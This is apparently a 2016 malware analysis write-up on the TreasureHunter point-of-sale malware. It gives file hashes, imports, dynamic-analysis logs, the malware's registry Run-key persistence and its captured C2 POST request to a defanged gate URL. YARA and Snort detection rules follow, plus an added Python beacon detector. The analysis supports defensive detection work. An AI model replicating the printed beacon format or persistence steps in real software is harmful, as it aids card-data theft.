Vitali Kremez

Treasure Hunter: Weird PoS Variant

7/10/2016


 
[*] MD5    : 2dfddbc240cd6e320f69b172c1e3ce58
[*] SHA-1  : e573a6fd61fd3928201d85dbffe5aefe21e49192
[*] SHA-256: e70614382ad300bd8c1f2cedb3259212057c40433e22ffeee7292ae576c4eae2

[+] File Type             : EXE
[+] Address of entry point: 0x00005a82
[+] Image Base Address    : 0x00400000
[+] Packer / Compiler     : MS Visual C++ 8.0

------------------------------------------------------------
Executable         \Windows\explorer.exe
Executable         \jucheck.exe
Web Page           logmeinrescue[.]us[.]com/system/oauth/gate[.]php
Library            ADVAPI32.dll
Library            KERNEL32.dll
Library            SHELL32.dll
Library            USER32.dll
Library            USERENV.dll
Library            WINHTTP.dll
Database           C:\work\treasureHunter\Release\treasureHunter

[+] Sections
    Name: .text   Virtual Address: 0x00001000  Size: 0x0000fcda  Entropy: 6.667572
    Name: .rdata  Virtual Address: 0x00011000  Size: 0x00005eb2  Entropy: 4.641277
    Name: .data   Virtual Address: 0x00017000  Size: 0x00002fe0  Entropy: 3.331543
    Name: .rsrc   Virtual Address: 0x0001a000  Size: 0x000001e0  Entropy: 4.710061
    Name: .reloc  Virtual Address: 0x0001b000  Size: 0x000012a4  Entropy: 6.678696
Size        : 100864 bytes
Type        : PE32 executable (GUI) Intel 80386, for MS Windows
Architecture: 32 Bits binary
MD5         : 2dfddbc240cd6e320f69b172c1e3ce58
SHA1        : e573a6fd61fd3928201d85dbffe5aefe21e49192
ssdeep      : 1536:d5cgmB+WGCa+A7ARq9DuqVcaFsWjcdtr2DlYItl:77piUA3qTqtKDlYS
imphash     : 1172c7987d01e157969e819ad80d2fd1
Date        : 0x56066F7F [Sat Sep 26 10:12:15 2015 UTC]
Language    : ENGLISH
CRC         : (Claimed) 0x0, (Actual) 0x253dd [SUSPICIOUS]
Entry Point : 0x405a82 .text 0/5
================
Offset | Instructions
----------------------------------------
0      | call 0x408ef3
5      | jmp 0x405a8c
10     | push byte 0x14
12     | push dword 0x4161f0
17     | call 0x4094a0
22     | call 0x4090da
27     | movzx esi,ax
30     | push byte 0x2
32     | call 0x408ea6
37     | pop ecx
38     | mov eax,0x5a4d
43     | cmp [0x400000],ax
50     | jz 0x405aba
52     | xor ebx,ebx
54     | jmp 0x405aed
56     | mov eax,[0x40003c]
61     | cmp dword [eax+0x400000],0x4550
71     | jnz 0x405ab6
73     | mov ecx,0x10b
78     | cmp [eax+0x400018],cx
85     | jnz 0x405ab6
87     | xor ebx,ebx
89     | cmp dword [eax+0x400074],0xe
96     | jna 0x405aed
98     | cmp [eax+0x5be80000],ebx

Suspicious:
  • The file modifies the registry.
  • The file contains 120 blacklisted strings.
  • The symbol (WinHttpReceiveResponse) is imported several (9) times.
  • The file opts for Address Space Layout Randomization (ASLR).
  • The file opts for cookies on the stack (GS).
  • The file has no Version.
  • The file does not contain a digital certificate.
  • The file checksum (0x00000000) is invalid.
  • The debug file name (treasurehunter.pdb) is different than the file name (crime_win_treasurehunt_pos).

Imports:
[1] KERNEL32.dll
[2] USER32.dll
[3] ADVAPI32.dll
[4] SHELL32.dll
[5] USERENV.dll
[6] WINHTTP.dll
Suspicious IAT:
[1] CopyFileA
[2] CreateDirectoryA
[3] CreateFileW
[4] CreateProcessA
[5] CreateThread
[6] CreateToolhelp32Snapshot
[7] DeleteFileA
[8] DeviceIoControl
[9] GetCommandLineA
[10] GetFileSize
[11] GetModuleFileNameA
[12] GetModuleFileNameW
[13] GetModuleHandleExW
[14] GetModuleHandleW
[15] GetProcAddress
[16] GetStartupInfoW
[17] IsDebuggerPresent
[18] LoadLibraryExW
[19] OpenProcess
[20] OpenProcessToken
[21] OutputDebugStringW
[22] Process32FirstW
[23] Process32NextW
[24] ReadProcessMemory
[25] RegCloseKey
[26] RegOpenKeyExW
[27] Sleep
[28] TerminateProcess
[29] UnhandledExceptionFilter
[30] WriteFile

Anti Debug discovered [7]
------------------------------------------------------------
Function           GetLastError
Function           IsDebuggerPresent
Function           OutputDebugStringW
Function           Process32FirstW
Function           Process32NextW
Function           TerminateProcess
Function           UnhandledExceptionFilter

offset   num  description [bits.endian.size]
  --------------------------------------------
  000151e0 2415 Misty md5const [32.le.256]
  00015db2 2545 anti-debug: IsDebuggerPresent [..17]
  000172e8 2053 RIPEMD-128 InitState [32.le.16&]

Dynamic Analysis
 
Processes:
PID       ParentPID        User    Path    
--------------------------------------------------
4256    3220    USER-06EF21E8DC:Administrator      C:\Documents and Settings\Administrator\Application Data\41ab9249dbb6472366a18be70e72cc72\jucheck.exe  
 
Monitored RegKeys
Registry Key    Value  
--------------------------------------------------
HKLM\Software\Microsoft\Windows\CurrentVersion\Run  jucheck=C:\Documents and Settings\Administrator\Application Data\41ab9249dbb6472366a18be70e72cc72\jucheck.exe

API Logger:
404ce2     CreateMutex(41ab9249dbb6472366a18be70e72cc72)   
4048ce     WaitForSingleObject(768,0)         
77f66aed     WaitForSingleObject(764,0)     
404a27     Copy(C:\Documents and Settings\Administrator\Desktop\treasure.exe->C:\Documents and Settings\Administrator\Application Data\41ab9249dbb6472366a18be70e72cc72\jucheck.exe) 
7c8283dc     WriteFile(h=75c)           
404824     RegSetValueExA (jucheck)
404b99     CreateProcessA(C:\Documents and Settings\Administrator\Application Data\41ab9249dbb6472366a18be70e72cc72\jucheck.exe,C:\Documents and Settings\Administrator\Application Data\41ab9249dbb6472366a18be70e72cc72\jucheck.exe 2fb216b58f88bebe8bec6e851f40904b373a574aa4d279d0a109a32efd84d3475b82b1e4fb1a37ac2250d1c1af226a677552901f268fa61bba0e4971,0,C:\Documents and Settings\Administrator\Application Data\41ab9249dbb6472366a18be70e72cc72)

File: jucheck.exe [no packer]
Size: 100864 Bytes
MD5: 2DFDDBC240CD6E320F69B172C1E3CE58

RegKeys
--------------------------------------------------
SOFTWARE\Microsoft\Windows NT\CurrentVersion
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
 
ExeRefs
--------------------------------------------------
File: jucheck_dmp.exe_
\Windows\explorer.exe
\jucheck.exe
C:\Documents and Settings\Administrator\Application Data\41ab9249dbb6472366a18be70e72cc72\jucheck.exe
Error - Treasure Hunter is already running on this computer! To re-install, close the jucheck.exe process and try again
 
Raw Strings:
--------------------------------------------------
File: jucheck_dmp.exe_
MD5:  4d3d7df594a0d379b073f8effca772c5
Size: 118786

Interesting Strings:
?report=true&v2=true
?request=true
\Windows\explorer.exe
Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727)
Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
success
GETKEYS
jucheck
\jucheck.exe
cmdLineDecrypted
C:\work\treasureHunter\Release\treasureHunter.pdb
\ntuser.ini
Cannot open store place
Select to gateway 2
Debug Message
POST
\\.\PhysicalDrive0
ssuccessfully sent the dumps!
SSeDebugPrivilege
Couldn't get a snapshot of the memory processes!
couldn't get a snapshot of the memory processes!
Clingfish mode activated!
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Error opening registry key for autostart in HKLM - not enough rights, trying to open in HKCU
Unknown error opening registry key for autostart
Error creating registry key for autostart
Successfully created registry key for autostart
Already running from the desired location
Successfully created the directory
Successfully copied the file
Failed to copy the file
Failed to create the directory, entering re-install (update) mode
Successfully deleted destination file
Failed to delete the destination file
Error - Treasure Hunter is already running on this computer! To re-install, close the jucheck.exe process and try again
An unknown error occured!
Cannot find %AppData%!
Failed to execute the file
Successfully executed the file
TreasureHunter version 0.1.1 Alpha, created by Jolly Roger (jollyroger@prv[.]name) for BearsInc. Greets to Xylitol and co.
Failed to delete original file, retrying
Successfully deleted original file
Couldn't get debug privileges
Successfully reached the gate
Failed to reach the gate

POST Request:
POST /system/oauth/gate[.]php?request=true HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727)
Host: logmeinrescue[.]us[.]com
Content-Length: 79
Connection: Keep-Alive
 
request=[number]&use=[number]&id=[number]
 

/* Global Rule -------------------------------------------------------------- */
/* Will be evaluated first, speeds up scanning process, remove at will */
 
global private rule gen_characteristics {
    condition:
        ( uint16(0) == 0x5a4d or uint16(0) == 0x0000 ) and filesize < 295KB
}
 
/* Rule Set ----------------------------------------------------------------- */
 
rule crime_win_treasurehunter_pos {
    meta:
        description = "Detects a TreasureHunter PoS variant"
        author = "Vitali Kremez"
        date = "2016-07-08"
        hash = "e70614382ad300bd8c1f2cedb3259212057c40433e22ffeee7292ae576c4eae2"

    strings:
        $s0 = "Error - Treasure Hunter is already running on this computer! To re-install, close the jucheck.exe process and try again" fullword wide
        $s1 = "logmeinrescue.us.com/system/oauth/gate.php" fullword ascii
        $s2 = "C:\\work\\treasureHunter\\Release\\treasureHunter.pdb" fullword ascii
        $s3 = "Couldn't get a snapshot of the memory processes!" fullword wide
        $s4 = "couldn't get a snapshot of the memory processes!" fullword wide
        $s5 = "Error opening registry key for autostart in HKLM - not enough rights, trying to open in HKCU" fullword wide
        $s6 = "TreasureHunter version 0.1.1 Alpha, created by Jolly Roger (jollyroger@prv.name) for BearsInc. Greets to Xylitol and co." fullword wide
        $s7 = "Couldn't get debug privileges" fullword wide
        $s8 = "\\Windows\\explorer.exe" fullword ascii
        $s9 = "Failed to execute the file" fullword wide
        $s10 = "ssuccessfully sent the dumps!" fullword wide
        $s11 = "\\jucheck.exe" fullword ascii
        $s12 = "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.3072" ascii
        $s13 = "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; ." ascii
        $s14 = "Unknown error opening registry key for autostart" fullword wide
        $s15 = "Successfully executed the file" fullword wide
        $s16 = "Error creating registry key for autostart" fullword wide
        $s17 = "Failed to create the directory, entering re-install (update) mode" fullword wide
        $s18 = "GETKEYS" fullword ascii
        $s19 = ":0:8:F:K:\\:k:|:" fullword ascii
        $s20 = "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 295KB and all of them
}

# sid 1000001 below is a placeholder in the local-use range; assign your own
alert tcp $HOME_NET any -> any any (msg:"TreasureHunter POS Alert"; content:"logmeinrescue.us.com"; content:"/system/oauth/gate.php"; pcre:"/(request=|&use=|&id=)/"; classtype:trojan-activity; sid:1000001; rev:1;)
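The POST request captured above and the Snort rule express the same three indicators: the gate host, the gate path, and the request=/use=/id= parameters. The script below is an added example, not code from the original post, that applies that logic to raw HTTP requests (for example, ones pulled from a proxy or full-packet capture) and, unlike the single pcre, distinguishes the C2 host from a benign host serving the same path. The sample requests are constructed for the demonstration and are not captured traffic; parse_http_request, is_treasurehunter_beacon and scan_requests are my own names.

```python
from urllib.parse import parse_qs

# Indicators taken from the report: gate host and path, and the form
# parameters the sample sends in its check-in body.
C2_HOST = "logmeinrescue.us.com"
GATE_PATH = "/system/oauth/gate.php"
BEACON_PARAMS = ("request", "use", "id")


def parse_http_request(raw: bytes) -> dict:
    """Split a raw HTTP/1.x request into method, path, query, headers and body.
    Header names are lower-cased so lookups are case-insensitive."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    path, _, query = target.partition("?")
    return {"method": method, "path": path, "query": query,
            "headers": headers, "body": body.decode("latin-1")}


def is_treasurehunter_beacon(raw: bytes) -> bool:
    """True when the request matches the gate check-in documented above:
    Host is the C2, the path is the gate script, and at least one beacon
    parameter appears in the query string or the form body."""
    req = parse_http_request(raw)
    host = req["headers"].get("host", "").split(":")[0].lower()
    if host != C2_HOST or req["path"] != GATE_PATH:
        return False
    params = set(parse_qs(req["query"], keep_blank_values=True))
    params |= set(parse_qs(req["body"], keep_blank_values=True))
    return any(p in params for p in BEACON_PARAMS)


def scan_requests(requests: list) -> list:
    """Return the indices of the requests that look like gate check-ins."""
    return [i for i, r in enumerate(requests) if is_treasurehunter_beacon(r)]


# Constructed sample traffic (not a capture). The first request mirrors the
# POST format shown above with made-up values; the others are look-alikes
# that a host-only or path-only match would wrongly flag.
SAMPLE_REQUESTS = [
    (b"POST /system/oauth/gate.php?request=true HTTP/1.1\r\n"
     b"Content-Type: application/x-www-form-urlencoded\r\n"
     b"Host: logmeinrescue.us.com\r\n"
     b"Content-Length: 20\r\n"
     b"Connection: Keep-Alive\r\n\r\n"
     b"request=1&use=2&id=3"),
    # same host, unrelated path
    (b"GET /favicon.ico HTTP/1.1\r\n"
     b"Host: logmeinrescue.us.com\r\n\r\n"),
    # same path and parameter names on a different host
    (b"POST /system/oauth/gate.php HTTP/1.1\r\n"
     b"Host: intranet.example.test\r\n"
     b"Content-Length: 20\r\n\r\n"
     b"request=1&use=2&id=3"),
    # gate path on the C2 host, mixed-case header, no beacon parameter
    (b"GET /system/oauth/gate.php HTTP/1.1\r\n"
     b"HOST: LogMeInRescue.us.com\r\n\r\n"),
]

if __name__ == "__main__":
    for i in scan_requests(SAMPLE_REQUESTS):
        print(f"request {i}: TreasureHunter gate check-in")
```

Because the parameters travel in the POST body, a detector that only sees URLs (most proxy logs) will only catch the ?request=true and ?report=true&v2=true variants of the query string; matching on the body requires the full request, which is why the Snort rule inspects the payload.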